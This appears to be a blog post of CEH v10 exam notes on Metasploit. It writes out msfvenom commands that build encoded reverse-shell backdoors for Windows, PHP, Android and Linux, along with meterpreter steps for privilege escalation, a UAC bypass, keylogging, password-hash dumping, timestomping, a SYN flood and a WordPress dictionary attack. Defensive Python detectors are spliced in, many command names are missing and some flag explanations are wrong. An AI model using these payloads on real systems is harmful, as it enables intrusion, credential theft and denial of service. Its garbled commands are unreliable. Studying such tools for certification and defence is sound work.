Metasploit Framework in CEH Exam

This post explains what the Metasploit Framework is and how it is used in the Certified Ethical Hacker (CEH) exam. It is not intended to be an overall review of the tool.

It is focused on CEH v10.

What is Metasploit Framework?

Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.

The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.

Jack Rhysider's Darknet Diaries podcast interviewed HD Moore and covers the history of early Metasploit. You can listen to (or read) episode 114 "HD" on Darknet Diaries' website, Spotify or Apple Podcasts.

Metasploit applications

Metasploit Framework consists of a series of applications. The ones used in CEH are:

  1. msfdb: manages the Metasploit Framework database.
  2. msfvenom: tool to create trojans (payload files).
  3. msfconsole: tool to execute exploits.

Run from a Linux terminal, it opens the Metasploit Framework.


msfdb init

Initializes the Metasploit database. The PostgreSQL service must already be running (for example, service postgresql start).

You may need to restart the database afterwards (e.g. service postgresql restart).


msfvenom -l

Lists all the available exploits in the database.


  • -p: payload. Value example: windows/meterpreter/reverse_tcp
  • --platform: platform. Value example: Windows
  • -a: architecture. Example: x86
  • -e: encoder. Value example: x86/shikata_ga_nai
  • -b: characters to avoid (bad characters). Value example: "\x00" (including quotes)
  • LHOST=: value for the local host. Example: LHOST=
  • LPORT=: value for the local port. Example: LPORT=444
  • -f: format of the output. Example: exe or elf
  • >: path for the output. Example: Desktop/Backdoor.exe
  • -o: also a path for the output

Used to connect to remote Windows machines:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST= -f exe > Desktop/Backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST= LPORT=444 -o /root/Desktop/Test.exe

Generates PHP code. It must be copied into a text file saved with a .php extension, and then run on a web server:

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw [generates a file]

Generates an apk file for Android:

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST= R > Desktop/Backdoor.apk

Generates a file for Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf
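As an added example (not code from the original post or from Metasploit), a small Python parser that turns msfvenom command lines like the ones above into a record of their options, which is handy both for reading lab notes and for a blue team triaging shell history. The `callback` helper is an assumption of this example: for reverse payloads it reports the LHOST:LPORT the generated file will connect back to, falling back to Metasploit's default port 4444.

```python
import shlex

# Options that take a value, keyed to the name stored in the record;
# the shell redirection '>' is recorded like -o.
VALUE_OPTS = {"-p": "payload", "--platform": "platform", "-a": "arch",
              "-e": "encoder", "-b": "badchars", "-f": "fmt",
              "-o": "output", ">": "output"}

def parse_msfvenom(cmdline: str) -> dict:
    """Parse one msfvenom shell command line into a dict of its options.
    En-dashes and curly quotes (what blogs turn '--' and '"' into) are undone."""
    fixed = (cmdline.replace("\u2013", "--")
                    .replace("\u201c", '"').replace("\u201d", '"'))
    argv = shlex.split(fixed)
    if not argv or argv[0] != "msfvenom":
        raise ValueError("not an msfvenom command")
    cmd = {"raw": False, "datastore": {}}    # datastore holds LHOST=, LPORT=, ...
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_OPTS:
            if i + 1 >= len(argv):
                raise ValueError(f"{tok} needs a value")
            cmd[VALUE_OPTS[tok]] = argv[i + 1]
            i += 1
        elif tok == "R":                     # legacy flag: raw output
            cmd["raw"] = True
        elif "=" in tok:                     # datastore option, e.g. LHOST=10.0.0.5
            key, _, val = tok.partition("=")
            cmd["datastore"][key.upper()] = val   # lhost= and LHOST= are the same
        else:
            raise ValueError(f"unexpected token {tok!r}")
        i += 1
    return cmd

def callback(cmd: dict):
    """For reverse payloads, the (LHOST, LPORT) the generated file connects
    back to (LPORT defaults to Metasploit's 4444); None for bind payloads."""
    if "reverse" not in cmd.get("payload", ""):
        return None
    ds = cmd["datastore"]
    return ds.get("LHOST", ""), ds.get("LPORT", "4444")
```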


msfconsole commands


Displays hosts on subnetwork.


Displays services on active hosts.


Checks the database status. If the database is not connected, you may need to initialize it.

If the message says it succeeded (e.g., postgresql connected to msf), everything is correct.

If it is not, you may need to re-run msfdb.

db_import <filename>

Imports a file from local disk into the msf database.


Calls the nmap command.


I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.

use <module name with path>

Enters an msf module. Value example: scanner/smb/smb_version

show auxiliary

Lists the available auxiliary tools.

show exploits

Lists the available exploits.

show payloads

Lists the available payloads.


Sends a multi/handler session to the background and returns to the msf shell.

Auxiliary modules


The SMB scanner module scanner/smb/smb_version is used to get the OS flavour.

Seen on CEHv10, mod. 2, ex. 5.

show options


set THREADS 100



Seen on CEHv10, mod. 4, ex. 9.


Exploit modules


Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC".

set payload windows/meterpreter/reverse_tcp

Sets the payload.

Sets the local host.

set LPORT <port number>

Sets the local port. For example, 4444.

exploit -j -z

Runs the exploit. -j means that it runs in the background with one or more sessions. -z is the same, but with just one session. I do not know what it means when both are given.

Then we must wait until a connection appears, that is, until a compromised computer executes the corresponding payload executable created with msfvenom.

sessions -i 1

Selects session 1. Example: sessions -i 1

Lists processes.

Gets the remote machine username.


Displays the current user.


Gets the system info.

getsystem -t 1

Escalates privileges. If it does not work, you can try exploit/windows/local/bypassuac/fodhelper.


Displays the current path.


Checks the IP address.

timestomp secret.txt -v

Displays the created time, accessed time, modified time, and entry modified time of the file.
download <filename>

Downloads a file from the remote folder to the local Home folder. Example: download bootmgr

search -f "filename.ext"

Searches for a file.

Captures all keyboard input from the victim system.

Views the captured keyboard input.

Displays the idle time in seconds.

Shuts down the computer.

execute -f cmd.exe -c -H and then shell

Executes a Windows shell on the remote computer.
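The timestomp command listed above rewrites a file's MACE times. As an added example (not code from the original post or from Metasploit), here is a Python heuristic scan a responder can run over a directory to find files whose timestamps look rewritten. It assumes a volume that stores sub-second timestamps (NTFS, ext4, APFS): the core check is that a time set from a "MM/DD/YYYY HH24:MI:SS" string carries no fractional second, while normal file activity almost always does; a second check flags timestamps in the future.

```python
import os
import time

NS_PER_SEC = 1_000_000_000


def suspicious_timestamps(times_ns: dict, now_ns: int = None) -> dict:
    """Apply two forensic heuristics to one file's timestamps ({name: ns since epoch}).
    whole_second: the sub-second part is exactly zero. Normal activity leaves a random
    fraction, but a time set from a 'MM/DD/YYYY HH24:MI:SS' string (timestomp -m/-a/-c/-z)
    has none. future: the time is later than the clock, which no real activity produces."""
    now_ns = time.time_ns() if now_ns is None else now_ns
    return {
        "whole_second": [n for n, ns in times_ns.items() if ns % NS_PER_SEC == 0],
        "future": [n for n, ns in times_ns.items() if ns > now_ns],
    }


def file_times_ns(path: str) -> dict:
    """Collect the MACE-like timestamps the OS exposes for path, in nanoseconds."""
    st = os.stat(path)
    times = {"modified": st.st_mtime_ns, "accessed": st.st_atime_ns,
             "changed": st.st_ctime_ns}
    if hasattr(st, "st_birthtime_ns"):   # creation time, only where the platform exposes it
        times["created"] = st.st_birthtime_ns
    return times


def scan_directory(root: str) -> dict:
    """Return {path: findings} for every file under root that trips a heuristic.
    Only meaningful on volumes with sub-second timestamps (NTFS, ext4, APFS);
    a FAT or other 1-second-resolution volume would flag every file."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            findings = suspicious_timestamps(file_times_ns(path))
            if findings["whole_second"] or findings["future"]:
                hits[path] = findings
    return hits
```

A hit is a lead, not proof: files restored from some archive formats also carry whole-second times, so confirm against other evidence (on NTFS, the $FILE_NAME timestamps, which timestomp does not touch).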


It is used once a connection has been established with exploit/multi/handler. It allows the getsystem command to succeed.

Seen on CEHv10, mod. 5, ex. 5 "Escalating Privileges by Exploiting Client Side Vulnerabilities".

It is used to escalate privileges.

show options

Displays all the options related to the module.

set SESSION <session number>

Selects the session opened with exploit/multi/handler. Example: set SESSION 1

set payload windows/meterpreter/reverse_tcp

show options

set TARGET 0

Sets the exploit target id.

Runs the exploit. If it succeeds, privileges can be escalated by running getsystem.

run post/windows/gather/smart_hashdump

Dumps the Windows hashes.


Performs a SYN flood on the target. Seen in module 10, lab/exercise 1.

set RHOST [IP Address of Windows 10]

set RPORT 21

set SHOST [IP Address of Windows Server 2016] (sets the spoofed source IP address)

set TIMEOUT 20000 (number of seconds to wait for new data)


This module is used to perform a dictionary attack against a WordPress site.

Featured in module 14, exercise 2.

show options

Displays the options.

set PASS_FILE /root/Desktop/Wordlists/Passwords.txt

Sets the file containing the passwords for the dictionary attack.

set RHOSTS [IP Address of Windows Server 2012]

Sets the target IP address, e.g., the Windows Server 2012 IP address.

set RPORT 8080

Sets the target machine port, e.g., the Windows Server 2012 port.

set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/

Sets the base path of the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.

set USERNAME admin

Sets the username whose password is to be cracked.

Run the exploit. You must search through all the results and look for the lines marked in green.
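From the defender's side, the dictionary attack described above leaves a very recognisable trace in the web server's access log: one source POSTing to wp-login.php over and over. As an added example (not code from the original post, from WordPress or from Metasploit), a Python detector over combined-format access-log lines; the log lines are constructed here to mirror the lab's /CEH/ site on port 8080, and the threshold and window values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line; only the fields we need are captured.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def login_bursts(lines, threshold=10, window=timedelta(minutes=1)):
    """Sources that POST to wp-login.php more than `threshold` times inside any
    `window` -> {ip: {"attempts": n, "success": bool}}. success: the IP also got a
    302 from wp-login.php (WordPress redirects on a correct password, 200 on a wrong one)."""
    posts, redirected = defaultdict(list), set()
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
            if rec["status"] == "302":
                redirected.add(rec["ip"])
    hits = {}
    for ip, times in posts.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):              # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            hits[ip] = {"attempts": best, "success": ip in redirected}
    return hits

def sample_log():
    """Constructed sample: a normal visitor, and one host hammering the CEH lab's
    /CEH/wp-login.php every two seconds, the last attempt being answered with 302."""
    fmt = "%d/%b/%Y:%H:%M:%S +0000"
    base = datetime(2019, 3, 1, 10, 0, 0, tzinfo=timezone.utc)
    lines = [f'192.168.1.20 - - [{base.strftime(fmt)}] "GET /CEH/ HTTP/1.1" 200 5120']
    for i in range(25):
        ts = (base + timedelta(seconds=2 * i)).strftime(fmt)
        status = 302 if i == 24 else 200
        lines.append(f'10.10.10.5 - - [{ts}] "POST /CEH/wp-login.php HTTP/1.1" {status} 3412')
    return lines
```

The same count-per-window logic works on XML-RPC (xmlrpc.php) requests, which brute-force tools also use against WordPress; only the path test changes.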

CEHv10 exercises where Metasploit Framework is featured

  • Mod. 2 “Information Gathering”
    • Ex. 5 “Information gathering using Metasploit”
  • Mod. 4 “Enumeration”
    • Ex. 9 “SNMP Enumeration Using snmp_enum”
  • Mod. 6 “System Hacking”
    • Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
    • Ex. 5 “Escalating Privileges by Exploiting Client Side Vulnerabilities”
    • Ex. 6 “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
  • Mod. 12
    • Ex. 5 “Bypassing Windows Firewall using Metasploit”
  • Mod. 14
    • Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
    • Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
  • Mod. 17 “Hacking Mobile Platforms”
    • Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
  • Mod. 19
    • Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”
